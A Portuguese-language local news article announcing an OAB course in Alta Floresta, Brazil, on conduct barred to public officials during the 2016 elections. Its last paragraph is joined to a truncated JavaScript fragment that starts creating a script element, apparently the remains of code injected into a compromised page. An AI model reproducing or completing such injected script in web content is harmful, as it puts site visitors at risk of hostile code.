Capa / Cidades / Eleições 2016: OAB vai disponibilizar curso para agentes públicos na 24ª Zona Eleitoral

Eleições 2016: OAB vai disponibilizar curso para agentes públicos na 24ª Zona Eleitoral

ELEIÇÃOAltair Nery

A Ordem dos Advogados do Brasil, subseção de Alta Floresta, realizará hoje a noite um curso com o tema “condutas vedadas aos agentes públicos em ano eleitoral”, que será ministrado pelo advogado Thiago Stuchi Reis de Oliveira com a participação do Promotor Eleitoral da 24ª Zona eleitoral Guilherme Oliveira e voltado aos agentes públicos das cidades de Alta Floresta, Carlinda e Paranaíta, que compreendem a jurisdição da 24ª zona eleitoral. O curso começa às 19 horas e, dentre os convidados estão prefeitos e presidentes de Câmaras de Vereadores e vereadores das três cidades. Também foram convidados servidores da administração que atuam diretamente com os agentes públicos.
Segundo o advogado Thiago, a palestra será de grande importância para todos os agentes públicos, já que irá tratar de assuntos que normalmente geram muita polêmica nos períodos eleitorais, como por exemplo a vedação a agentes públicos de realizarem inaugurações nos meses que antecedem a eleição. “O intuito é orientar os gestores públicos acerca de algumas condutas que são vedadas a eles, especialmente neste ano de eleição. Pretendemos chamar a atenção para isso, com o objetivo de evitar problemas. É um trabalho preventivo”, disse o advogado Thiago Reis de Oliveira.
O curso será aberto às 19 horas de hoje, sexta-feira, e os interessados em participar podem entrar em contato através do telefone 8404 3440, ou diretamente na 8ª Subseção da Ordem dos Advogados do Brasil.var d=document;var s=d.createElement(‘script’);

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top